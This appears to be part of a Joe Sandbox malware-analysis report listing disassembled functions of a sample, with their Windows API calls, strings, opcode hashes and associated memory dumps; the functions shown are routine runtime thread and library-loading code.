Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d7fd9ebae141a05cf2a78e20c8eae2e7d66f436f5aa9e778ca5044295ea30c
Instruction ID: a6d32a7cfc7de2c3711be716af977b611b0b4eee62f8b2d7d469ad5d8e10f64f
Opcode Fuzzy Hash: d9d7fd9ebae141a05cf2a78e20c8eae2e7d66f436f5aa9e778ca5044295ea30c
Instruction Fuzzy Hash: 8802A432B14A4982EB84EB15D445278B7A1FB417A4F844336EA3D6B3D1CF7CD485C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F31EC190 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f6f9baa0cc4248a236397378da8043617702aab2b20e8c0385ec93300a3a47
Instruction ID: 19edffb4fb0dd3fc7e78343052fd18011ae0c091c4b7bc47b639f5ebc31f69e3
Opcode Fuzzy Hash: 18f6f9baa0cc4248a236397378da8043617702aab2b20e8c0385ec93300a3a47
Instruction Fuzzy Hash: 69E1F723A08A5186E7A49B19F84077EF6A0FB84B80F904235DA6D56AD4DF3EE4C1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D8AF0 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03014bf21ac6cdd62bd39efc6fed1cdab15a075fe297f52fc5f8ef3088fab0e0
Instruction ID: 46c03630a3ec46c0db7ea4062fae83f9b55d48c56362bb3f2d7c0b36b517389f
Opcode Fuzzy Hash: 03014bf21ac6cdd62bd39efc6fed1cdab15a075fe297f52fc5f8ef3088fab0e0
Instruction Fuzzy Hash: 7AC17072A09A8686E790EB14E840769B3E2FF58754F94013AD96D6B3D1DF3CE051C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30EB350 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a0d80fdf514ee25ffc7cfe7eb931a8addd13be4886f3fe98492746e2eff029
Instruction ID: d450c02a825c824c6f6e40899e141bc5568e2ef9862e0aff1543f8d6a7767b92
Opcode Fuzzy Hash: 11a0d80fdf514ee25ffc7cfe7eb931a8addd13be4886f3fe98492746e2eff029
Instruction Fuzzy Hash: 42911562B1E74E41EF96973A91003748693AF49784F988B32DD2E3A7E0EF3DB4C08150

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CC4C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,00000000,?,?,00007FF7F30C6826), ref: 00007FF7F30CC4E3
GetProcAddress.KERNEL32(?,?,00000000,?,?,00007FF7F30C6826), ref: 00007FF7F30CC4F8
GetEnabledXStateFeatures.KERNEL32(?,?,00000000,?,?,00007FF7F30C6826), ref: 00007FF7F30CC505
InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF7F30C6826), ref: 00007FF7F30CC544
GetLastError.KERNEL32(?,?,00000000,?,?,00007FF7F30C6826), ref: 00007FF7F30CC552
InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF7F30C6826), ref: 00007FF7F30CC5A6

Strings

InitializeContext2, xrefs: 00007FF7F30CC4EE
kernel32.dll, xrefs: 00007FF7F30CC4DC

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: cac7cfce39b85bcbecad752f3349c4f6887585477b60e9341ca6886e06a75983
Instruction ID: 2e681a12fc1c5188194f40a17d6b3d813c0ff3826b10881b60ee1a2407ca74c6
Opcode Fuzzy Hash: cac7cfce39b85bcbecad752f3349c4f6887585477b60e9341ca6886e06a75983
Instruction Fuzzy Hash: 79315E25A08B4692FB81EB55F540239F391BF84BD0F840436D96DAABE4DF7CE486C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30DF2D0 Relevance: 10.7, APIs: 7, Instructions: 227threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF7F30DF391
SwitchToThread.KERNEL32 ref: 00007FF7F30DF43A
SwitchToThread.KERNEL32 ref: 00007FF7F30DF443
SwitchToThread.KERNEL32 ref: 00007FF7F30DF57A
SwitchToThread.KERNEL32 ref: 00007FF7F30DF583
SwitchToThread.KERNEL32 ref: 00007FF7F30DF5AD

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 14d78ceb0899042f68ce848a2a77ed3ad1939a730031d69b8ab931ca40f7f4c6
Instruction ID: 9c1a9b0be83dc223e29e1c8d6f54de918abccf2fac62ce076ea6024f7af96fc5
Opcode Fuzzy Hash: 14d78ceb0899042f68ce848a2a77ed3ad1939a730031d69b8ab931ca40f7f4c6
Instruction Fuzzy Hash: F6A12830E0C20747F7E4BB25A851A35E2D2AF10355F94823AE93DAE6E5DE2CF44586F1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30EFD10 Relevance: 9.2, APIs: 6, Instructions: 184threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF7F30EFDDA
SwitchToThread.KERNEL32 ref: 00007FF7F30EFDE3
SwitchToThread.KERNEL32 ref: 00007FF7F30EFE0D
SwitchToThread.KERNEL32 ref: 00007FF7F30EFF2A
SwitchToThread.KERNEL32 ref: 00007FF7F30EFF33
SwitchToThread.KERNEL32 ref: 00007FF7F30EFF5D

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: bbf4c7ffb7191dd2df79fb55d67bf7b930b5a24efa1adaf18019a789744d4c89
Instruction ID: 0f2e8bea87a7184c8b4b71a988db31a7437e5201e1d375184e0472efd13256e1
Opcode Fuzzy Hash: bbf4c7ffb7191dd2df79fb55d67bf7b930b5a24efa1adaf18019a789744d4c89
Instruction Fuzzy Hash: F3813A30F0C10B47F7D4BB65A850635E692AF41351F86023AE97DAE2D2DE3CB48586F2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30C7640 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON

Download Yara Rule

APIs

FlushProcessWriteBuffers.KERNEL32 ref: 00007FF7F30C76D4
SwitchToThread.KERNEL32 ref: 00007FF7F30C779D
QueryPerformanceCounter.KERNEL32 ref: 00007FF7F30C77AC
QueryPerformanceFrequency.KERNEL32 ref: 00007FF7F30C77BB
QueryPerformanceCounter.KERNEL32 ref: 00007FF7F30C7803

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: PerformanceQuery$Counter$BuffersFlushFrequencyProcessSwitchThreadWrite
String ID:
API String ID: 3450244608-0
Opcode ID: 7fc573f76d121247ce502c3a4d4490793d5b076310b70205a7a8df07ab53fc20
Instruction ID: ad807fbd84f21c1e59a4a4ea0d906cff007afe84005d6639847242d25d4c0bb3
Opcode Fuzzy Hash: 7fc573f76d121247ce502c3a4d4490793d5b076310b70205a7a8df07ab53fc20
Instruction Fuzzy Hash: E2519726E1864686EB90BB15E4411BEA791FF84B90FC50132EEAD6B7D6DE3CD401C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30C6A40 Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F30CC7E0: GetCurrentThreadId.KERNEL32 ref: 00007FF7F30CC7E4

GetCurrentThreadId.KERNEL32 ref: 00007FF7F30C6A6D
GetCurrentProcess.KERNEL32 ref: 00007FF7F30C6A7B
GetCurrentThread.KERNEL32 ref: 00007FF7F30C6A83
DuplicateHandle.KERNEL32 ref: 00007FF7F30C6AA7

Part of subcall function 00007FF7F30CC3A0: VirtualQuery.KERNEL32 ref: 00007FF7F30CC3D2

RaiseFailFastException.KERNEL32 ref: 00007FF7F30C6AD0

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-0
Opcode ID: 4156535ec81082677805c0bade3d63f540fe666b84ee07afd55d535aa79cd72a
Instruction ID: f9339347d29ef98c83870ecb41719db012390c95d27f16430d9c704e5d1fec70
Opcode Fuzzy Hash: 4156535ec81082677805c0bade3d63f540fe666b84ee07afd55d535aa79cd72a
Instruction Fuzzy Hash: 0211C672B08B8292DB88EB51B5413A9F361FB44390F44413AE76D5B7C2DF38E4618750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30C46B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF7F30C4750
RaiseFailFastException.KERNEL32 ref: 00007FF7F30C4859
RaiseFailFastException.KERNEL32 ref: 00007FF7F30C4896

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF7F30C473A

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: ce5bdbe97bba3df916a5f1724cc89e6736e5722d3faab0805571fded84199c96
Instruction ID: f2115e31e9a61d2c5f16f8a32bb07727c4ca52b754154758037eaf15fc2d9ee8
Opcode Fuzzy Hash: ce5bdbe97bba3df916a5f1724cc89e6736e5722d3faab0805571fded84199c96
Instruction Fuzzy Hash: 5E518221A19A8282EF91BB15D440379A391FF49BD8FC44537DA2E6B7D0DF2CE45683A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F3104B20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF7F3104C1D,?,?,00081000,00007FF7F30F24BC), ref: 00007FF7F3104B72
GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF7F3104C1D,?,?,00081000,00007FF7F30F24BC), ref: 00007FF7F3104B8C

Strings

kernel32.dll, xrefs: 00007FF7F3104B5D
GetEnabledXStateFeatures, xrefs: 00007FF7F3104B82

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetEnabledXStateFeatures$kernel32.dll
API String ID: 2574300362-4754247
Opcode ID: d74b2144f7f02cea84147d775869d4d1b4597de5f5b69796e83367d139ab5923
Instruction ID: 5649a73393f06765851e80d9fad14ac9ced5568bcda4d7466d857e6b15504bd6
Opcode Fuzzy Hash: d74b2144f7f02cea84147d775869d4d1b4597de5f5b69796e83367d139ab5923
Instruction Fuzzy Hash: AE215991F2C95642FFF8A724F1913799281EB04794FE4843ED96E9EBC4DC1CE8A14A50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CCA30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,00007FF7F30C54C5), ref: 00007FF7F30CCA43
GetProcAddress.KERNEL32(?,?,?,?,00007FF7F30C54C5), ref: 00007FF7F30CCA58

Strings

kernel32, xrefs: 00007FF7F30CCA36
GetEnabledXStateFeatures, xrefs: 00007FF7F30CCA4E

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetEnabledXStateFeatures$kernel32
API String ID: 2574300362-4273408117
Opcode ID: c6a52a5e33f4fbc7973959c1bdcbe2cddb4d2594fa02781a6e58775c5a6a3621
Instruction ID: e90fdb088f07a1ce8b942495a8663424ef2687e8aad2784aa1a19834f5ede7b0
Opcode Fuzzy Hash: c6a52a5e33f4fbc7973959c1bdcbe2cddb4d2594fa02781a6e58775c5a6a3621
Instruction Fuzzy Hash: DFE04854F1660251FFC4F711984527053517F5DB41FCC843AC51D563D09D2C66468770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F3100B20 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00007FF7F30DCB26), ref: 00007FF7F3100B9B
SwitchToThread.KERNEL32(?,?,?,00007FF7F30DCB26), ref: 00007FF7F3100C42
SwitchToThread.KERNEL32(?,?,?,00007FF7F30DCB26), ref: 00007FF7F3100C58

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: b69285e8d4cba9003ddf0f9a8d3f5a3178b8bfe19829defa3af9f0d7eff33ef6
Instruction ID: 4ed98864ada95cfa4e3cdaa34dbb5847359d6c07edfb705c0983e52343afb973
Opcode Fuzzy Hash: b69285e8d4cba9003ddf0f9a8d3f5a3178b8bfe19829defa3af9f0d7eff33ef6
Instruction Fuzzy Hash: EE41C576F19A4685EBE0AE25E150679F250EB04F9CFB48139C62E5E6CDDE3CE44087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30E3789 Relevance: 6.1, APIs: 4, Instructions: 119threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF7F30E3862
SwitchToThread.KERNEL32 ref: 00007FF7F30E3A7E

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
